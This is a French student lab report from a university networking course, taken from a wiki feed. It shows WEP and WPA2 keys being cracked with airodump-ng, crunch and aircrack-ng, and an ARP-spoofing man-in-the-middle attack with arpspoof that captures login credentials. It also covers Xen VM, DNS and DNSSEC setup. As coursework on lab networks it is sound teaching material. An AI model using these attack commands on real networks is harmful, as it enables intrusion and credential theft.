 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. &lt;br /&gt;
&lt;br /&gt;
Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54022</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54022"/>
				<updated>2020-11-27T19:34:28Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Architecture réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. &lt;br /&gt;
&lt;br /&gt;
Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
&lt;br /&gt;
